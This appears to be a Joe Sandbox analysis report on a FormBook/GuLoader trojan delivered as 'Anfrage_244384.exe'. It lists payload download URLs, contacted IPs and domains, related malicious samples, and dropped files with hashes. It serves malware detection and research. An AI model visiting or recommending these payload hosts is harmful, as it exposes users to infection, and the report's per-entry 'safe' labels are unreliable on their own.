https://duckduckgo.com/ac/?q=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reg.ru	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://familytherapycenter.rs/	Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_se	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_n	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://familytherapycenter.rs/LxuQG254.bin2	Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://familytherapycenter.rs/LxuQG254.bins	Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Anfrage_244384.exe	false		high
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.reg.ru/whois/?check=&dname=www.svarus.online&reg_source=parking_auto	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://familytherapycenter.rs/LxuQG254.bink	Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://familytherapycenter.rs/LxuQG254.binl	Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://familytherapycenter.rs/LxuQG254.binA	Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
http://nsis.sf.net/NSIS_Error	Anfrage_244384.exe	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
https://www.reg.ru/sozdanie-saita/	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_host	verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.40.95.144	familytherapycenter.rs	Germany		24940	HETZNER-ASDE	false
194.58.112.174	www.svarus.online	Russian Federation		197695	AS-REGRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1550253
Start date and time:	2024-11-06 16:09:43 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Anfrage_244384.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/11@2/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 85% Number of executed functions: 92 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Anfrage_244384.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.40.95.144	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage24438.zip	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
194.58.112.174	BkZqIS5vlv.exe	Get hash	malicious	FormBook	Browse	www.lichnyyrost.online/5xjb/
	NIlfETZ9aE.exe	Get hash	malicious	FormBook	Browse	www.lichnyyrost.online/5xjb/
	En88bvC0fc.exe	Get hash	malicious	FormBook	Browse	www.solutioncode.online/yxqw/
	Quote_General_Tech_LLC_637673,PDF.exe	Get hash	malicious	FormBook	Browse	www.cpamerix.online/gl7x/
	Ponta Saheb. PO 4400049817.exe	Get hash	malicious	FormBook	Browse	www.svarus.online/hw86/
	New Order list attached.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.cpamerix.online/muj9/
	A4mmSHCUi2.exe	Get hash	malicious	FormBook	Browse	www.marketplacer.top/d4tr/
	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	www.svarus.online/58q7/
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.dpo-medicina.online/k2c0/
	DHL TRACKING.exe	Get hash	malicious	FormBook	Browse	www.svarus.online/w04n/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.svarus.online	Ponta Saheb. PO 4400049817.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	DHL TRACKING.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	P1 BOL.exe	Get hash	malicious	Unknown	Browse	194.58.112.174
	zamowienie.exe	Get hash	malicious	GuLoader	Browse	194.58.112.174
	10145202485.vbs	Get hash	malicious	GuLoader	Browse	194.58.112.174
familytherapycenter.rs	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	Anfrage24438.zip	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	Anfrage24438.zip	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	getscreen-868841125.exe	Get hash	malicious	Unknown	Browse	78.47.165.25
	getscreen-868841125.exe	Get hash	malicious	Unknown	Browse	78.47.165.25
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	DeGrsOm654.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	PO_11000262.vbs	Get hash	malicious	FormBook	Browse	148.251.114.233
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
AS-REGRU	BkZqIS5vlv.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	31.31.196.17
	http://dmalmotors.ru/remont-avtoelektriki.html	Get hash	malicious	HTMLPhisher	Browse	37.140.192.118
	NIlfETZ9aE.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	wODub61gZe.exe	Get hash	malicious	FormBook	Browse	31.31.196.17
	r6lOHDg9N9.exe	Get hash	malicious	FormBook	Browse	31.31.196.17
	En88bvC0fc.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Quote_General_Tech_LLC_637673,PDF.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	V7FWuG5Lct.exe	Get hash	malicious	Quasar	Browse	193.124.205.71
	Ponta Saheb. PO 4400049817.exe	Get hash	malicious	FormBook	Browse	194.58.112.174

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	fIwP4c7xYt.exe	Get hash	malicious	GuLoader	Browse	188.40.95.144
	6b94X7dMrG.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.40.95.144
	0hNX6q4DZ0.exe	Get hash	malicious	GuLoader	Browse	188.40.95.144
	3Pd480eWHA.exe	Get hash	malicious	AgentTesla	Browse	188.40.95.144
	N2DJ1eUIE6.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	SecuriteInfo.com.FileRepMalware.29777.16321.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.40.95.144
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144
	Justificante de pago.exe	Get hash	malicious	GuLoader	Browse	188.40.95.144
	Anfrage24438.zip	Get hash	malicious	FormBook, GuLoader	Browse	188.40.95.144

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage24438.zip	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Anfrage24438.exe	Get hash	malicious	FormBook, GuLoader	Browse
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	5112024976.exe	Get hash	malicious	FormBook, GuLoader	Browse
	21st OCTOBER 2024 234876sdf ORDER_PDF.exe	Get hash	malicious	FormBook, GuLoader	Browse
	21st OCTOBER 2024 234876sdf ORDER_PDF.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\02-E8420l

Download File

Process:	C:\Windows\SysWOW64\verclsid.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.7711167426271945
Encrypted:	false
SSDEEP:	192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
MD5:	3F176D1EE13B0D7D6BD92E1C7A0B9BAE
SHA1:	FE582246792774C2C9DD15639FFA0ACA90D6FD0B
SHA-256:	FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
SHA-512:	0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 5112024976.exe, Detection: malicious, Browse Filename: 5112024976.exe, Detection: malicious, Browse Filename: Anfrage24438.zip, Detection: malicious, Browse Filename: Anfrage24438.exe, Detection: malicious, Browse Filename: Anfrage24438.exe, Detection: malicious, Browse Filename: 5112024976.exe, Detection: malicious, Browse Filename: 5112024976.exe, Detection: malicious, Browse Filename: 21st OCTOBER 2024 234876sdf ORDER_PDF.exe, Detection: malicious, Browse Filename: 21st OCTOBER 2024 234876sdf ORDER_PDF.exe, Detection: malicious, Browse Filename: Purchase Order.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\nilgedde.mes

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	Matlab v4 mat-file (little endian) Y, numeric, rows 0, columns 0
Category:	dropped
Size (bytes):	354845
Entropy (8bit):	1.2446363869824946
Encrypted:	false
SSDEEP:	768:E2oz5FNvncy2DZRau7W0sxOvPfSfpg5rWuWAAUIdde/FwPPMk/FOuyQv9biuPia6:opho02mYrKiKLFyJ1AIu2
MD5:	DF7A44909B03AB5BC45910B405D9977A
SHA1:	3D0583A7DFB39E559827189E02123F2C983A21D5
SHA-256:	5A3B61A0BC8E81E756374D2A9FF5087FA4496543A635738ACA8911E95D6340D9
SHA-512:	C2B4E951A185FC3FB75109B5CAA554431C1517588D04B8F2BA865F75BE448A0448364BCB84253C9B44579078787DDA616F33666C0C1BF902EC644EBC9A6FE621
Malicious:	false
Reputation:	low
Preview:	..................%.Y.............................[......................z...........................................8.................{................b.......W..........................................#.........................................%....z..................7......................................x.i...+............................................................................8......................................................................................................................-..3..................................................................................\|............T...........................#...........\.....A.............................................7..........'.................... ...................].................J.J..........s................................g..............W........................................................................................................$...g..........................................................

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\selefant.kri

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	298017
Entropy (8bit):	1.245520550165085
Encrypted:	false
SSDEEP:	768:nLoDoRi0SWvTrmnVqvh6dzfCaci65UhXqjMctTGA3QBgdRWqrw3q3LFPRvx7H155:DStBsLk6gsifeQIGA0iYRwvy8n
MD5:	B4C9FC75BAB8C9F006A7D9DDBC249F79
SHA1:	70D4047E7E3BB10CF237B82775C89A1D92700162
SHA-256:	1D84F9462C244A4500C213DF8DD79971B286392CA02BC536F5F6C3EEBC94E7E3
SHA-512:	2E2279CB3755AC5708ABB30E8342235B7F0A24223E3D6F4B2B21B62E59012A5126ADC1BD73D7B64E72634728DECCE7A049D3E6F5055F8D74E959BEE54EDBEA4C
Malicious:	false
Preview:	............................_..,...........................................................;...........................................................7...O..................'.........................................P.........L................@....................8....................v..................G.....h.............................................m..+b.....................................................m.......C.....................................i..........................................................................................,................................C..........a...........Y......,...........q....................................................................................................................................................................................................................p................S................L..........)..............................................kF........^........E.................................................

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\speil.int

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	497497
Entropy (8bit):	1.2525295412969446
Encrypted:	false
SSDEEP:	1536:rbNZ/Rg8JCCgxT2eIgde/lBWTTBwGceukAdTYz91n6n:9NRg836IVLWHeGxKYQ
MD5:	F3F6C6E37EAB51D3B9B9C059C1EB874C
SHA1:	401E5740CCFBC1DA83BD9B426C11020C812986F2
SHA-256:	B5A607F50C65E41B2BFF7F852F27373177D326D9DFA1040E1C2B3AF62F757BAB
SHA-512:	060B328595ADAF9E85B390AA2AACEEFE4C6197294B7C45594798755C5E04BE1E2110F617B51E38D7DF423CD807FA81B30702CE2548563980B9CA195ECF2C11A7
Malicious:	false
Preview:	.........................................o................j........................................c..6......................................../....................................................m...............................r.D................................T.........................................................8....................x...................................................................!.....O....\................G.........................................G........n....."................:.........................................................................................................@.......<..................................................i.......k..............................................................................................................................=.........g.........................k.............A.......[........................)...........e................................b.............................................6.............

C:\Users\user\AppData\Roaming\secretaryships\Hemmeligt70.Bly

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	58676
Entropy (8bit):	4.585503260397429
Encrypted:	false
SSDEEP:	768:hUm9EMv+RHOORqqYH3VEwnRnXNcmhdmPJPU9FLd86+qWhTeFVk6t6MmaEEXrDH9S:Om9chszXJlVdmPJuTWcJ6+3O9Rh
MD5:	CED0BE5E2D0028EFD3F1249AC1126BA3
SHA1:	3902CD952EA81D8A7D9E0FC1F17972967DDD917D
SHA-256:	4B029ECD2CE2EB26D9686573D7D891E689A717672BB8F76903BC44EC43DA2955
SHA-512:	7F14E8FD856D1D1E2FD89C692685EB70C462BC1C202C4946CC1B0D27E59264278264C3C7EA72E63F9B9BA35C434FAAB305724827A4C8D63ADBE78D8C4E4759FD
Malicious:	false
Preview:	..ll..__.....\|.....VVVVVV.........b...........YY...33333333333.A.KK.---........].{{{{...KK.....T.....................rr...................333.............Q..5....................11.............'........................7...\|\|\|\|\|\|\|..............V.........j.E.......................}....///................''''.......y....>............YYYY...ff.<.....WWWW............................................................................H.....................qq..'''.~..Y.....................@.....mmm.....;..kkkk.......RRRRR...........zz.............UU.....7777...........jj....n...............9.p....,...........Z....s.;..............BBBBBBBB..>.Q.......W........CCCC.xxxx.....FFFF........)......,,.............:::..[[[........TTT.[........PPPP.........S............////.......................^............!..JJ.,.\\\.........ff.........._........ ......hh.................``......................kkkkkk..................................f.Z.........DDDD...z..................R.].;.......R...OO............

C:\Users\user\AppData\Roaming\secretaryships\Tingid.pig

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	476422
Entropy (8bit):	1.2552031449987011
Encrypted:	false
SSDEEP:	1536:zGmPxn4XjZOVebnJjvYbTUBhGKcjnO/EeMHPm:Sm6zYVb849nH6
MD5:	F236A74F28F6F32F81F1347D9F129268
SHA1:	D5BE521661EE4BF3C186C3EAA0411DD5DF6F3EBA
SHA-256:	BEED12F00B12156FF9FA63595DE11A5C01493CF5F85488CB2E159CF1A8236778
SHA-512:	D6AD37DDF7B6B38B90F09186AC81C6A76F16F9A4613D6113F10D7B2A4F68129E570EFFC77A19B04F276277B7A569EBD5FD4A48D2E2E72CEA8CEE5A8F67CC5EF4
Malicious:	false
Preview:	.................................................................7...........................).....$....%..........................#.....M.....................................6.........N.........).......................................................................................a..............t..................................................T.........................................@...........................+..U...................A'..............L..................................................../.............2..............k.........................................................................................................&.............................................>...........................................................\|..........................?...............................&...................................n.q......}....................................E......................................................p........................................6..........

C:\Users\user\AppData\Roaming\secretaryships\anya.por

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	448073
Entropy (8bit):	1.2554221597008608
Encrypted:	false
SSDEEP:	1536:i9EUBeeNEu//hQg77ea6OP/B1p7to4APRUYZAkxe:qFZO5u/B1pBo510
MD5:	3AD8D5763CA124C7392D1F4F53D24F0E
SHA1:	17D48EF1AB8D52A31821A069C225D45201535899
SHA-256:	3965D74DBD296AA8E7524C773FE81FE63A78355145502153CB577E9CB136DDA0
SHA-512:	EE8BDE196A33297BFD4E51ED01E7D0178CF457497E822771D2BE3C58A97681AC52CD19A2BBBB71220F06F6D936A6AA67966295DF3C676104B9643F07CBE37EC8
Malicious:	false
Preview:	............y...k......... ....L..............................................................c....................d...........................p..............R.................................................5...............f.......{......................................................................................J...........@.................E....h...............0................M.................'..............................................-...............Z.........................{...............T............c.W..............n....................H...........................................\|...................................^...........w.................c...............................).....................................y.....<.......................................T........................................................3.....S..<.......?........................................1!......^.............................t................................................G........

C:\Users\user\AppData\Roaming\secretaryships\besiddertrang.gra

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	362911
Entropy (8bit):	1.2562704713226092
Encrypted:	false
SSDEEP:	768:uFKWW9YiDlIMhmjVacve6tEvHBLNB3tQsrTpPH8mZLAUFwsahGF48hDpWRcKthwz:u5W9yMJLNbJ1CbFV3Gd6Ie48dPs
MD5:	8AB9852274FA64E09B5711A2E7D94AAB
SHA1:	2C39272B969040B4C185EE4A69A5F04FD1F7C0DB
SHA-256:	FCD149788A3530E5E2CF5E17A09B1DE51EB67B51F3E8941E7091F88B610373F1
SHA-512:	6761208A22E8D93D70465E6DD9CF1B53826AA6BF0418DCCB0A6E5816A183790A61AD67EDCF52D21366975014701107563CE47A0465CEE801300493AEB566CC69
Malicious:	false
Preview:	....-......................................................................?d..........\.a.....................................8...............x...........e...................................)...............+..............................................i...................................................................................................................4......j................................................................................"......................................Z.....%...................................................................................................F............................................................................g...............................E./.....................................................................................Y........#.......F.......n.M.........................................................................................................................W..................................................

C:\Users\user\AppData\Roaming\secretaryships\darbyite.txt

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	497
Entropy (8bit):	4.296439217688297
Encrypted:	false
SSDEEP:	12:kdESMQrs7ZnIyxrqlLIRF0+UAkN0lCGsMqejQlJ8:QjMfpIuqPAEsOi
MD5:	1560371431CEB91914AF5B9D0D307EE1
SHA1:	182B8979D4D0F9F26366653638A9C92FDAFF0D56
SHA-256:	72A2010CDB6ED407FCA17CDB181D5F01801F16040C2C9443BD7CB5032CDAAEF7
SHA-512:	865EF0F7636149A47043183583635C2A4306BF49565166760672B88F0F9DA89A529FE4166DFF496327304E56A8A460B8113E5F3D58601C0B8A3EFAABD792AF3D
Malicious:	false
Preview:	avenging piktogrammernes duecento korsedderkop skurvognsudlejningernes fnges ranaria..kavitet ubetalelige forhalingen passado nautically formaalsbestemmelsernes admiralsuniformers..franchot unimposing rimfire.bemba barsac unflaked skbnesvanger.tige backchats leveret viktualieforretningernes processal dignitas altica epoxyharpikset sergenter forureningsbegrnsedes..sforsvaret antiquating photomechanically enighedernes firepot megrez almon aeneus madrassen thrallborn denoteres slipup tvebakken..

C:\Users\user\AppData\Roaming\secretaryships\straffespark.Sek

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	284322
Entropy (8bit):	7.771418895856943
Encrypted:	false
SSDEEP:	6144:fOiGjlSjER8DMKEzL4eNm6Vkg9XNf805ft+MODD+T:GCjEa4/zLD+05ek
MD5:	301AF874579F9CE64FCE51A01F616625
SHA1:	6D35516DA84E4342C8E094023B60175BAB5EDCEB
SHA-256:	35BE42786F6EF050A3BAEA615517E40958E6140A089E7D4A83283F1708994C03
SHA-512:	3275C3B39115C29FE923C415D36F4932C279018994E636CE6606C5604B6FA5DA984C7244BE7017AC78204F6F8D90AE7706B1E729FAD91EAEB3C2020A610755E4
Malicious:	false
Preview:	.............00.....................................................WW...:...GGG..ll......................;;;....U.........<.....M..........JJ..........K....................l...###........................;;...\\.t.999.lllll..ee.LL...........^^^.......CC...@.......(............................4....................9.........tt.....................'..........1.................\....GGG.....^........3.ZZ.:.w.....----...C.......ccccc...d.&&.....I..>>>>...www.......k.......o...~~................9......................F.A...XX.........dd........A..00...++..............%%%%...............NNNN....QQ.[[[......ffffff........0.........@.r..\|.i............KK......y...,,,,,,....TTTTT...a........CCC.........................`.....((.............RR.........7...x.......#.y............1..................._........TTTT.gg.................k........HHHH...................$$..................b..........((.?.=====....................M.B.j.!........sss....U..__...............$..;;...........////...x....WW.BB..3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.578007574835592
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Anfrage_244384.exe
File size:	1'240'824 bytes
MD5:	b03f23199ae987a7bce0ff1a0d742e3e
SHA1:	f454c8de72926ee9f98db7056fa89f0c3ada9666
SHA256:	eda014e3b658bfbbfd141c1459a3414d9ee8b7c139a3976fe732141fa9cf3f80
SHA512:	01ccdc0f586a8926a56f0d3bfee91c5e882bff5df84cbb5363df6681fb62863a8075af8261bb72ecf2360d9d4dc4552dddb4e1ec1da002c24b9416ff0d3f95be
SSDEEP:	24576:aCAoDyk/vnt3h1CzLuTIv08yZVk7ku8h7w6/t338euHdB4bU4VD4C:aCAfqvtx1UuTIMfg7ku8Vfx3/uHHSU4t
TLSH:	E445124337660AA5D45984F7D75ACD30BFA3BC7B018006EB325CB71A9ABA3F0452B539
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...<.MX.................b...\|.....

File Icon


Icon Hash:	076d76bb4c713307

Static PE Info

General

Entrypoint:	0x4031a3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
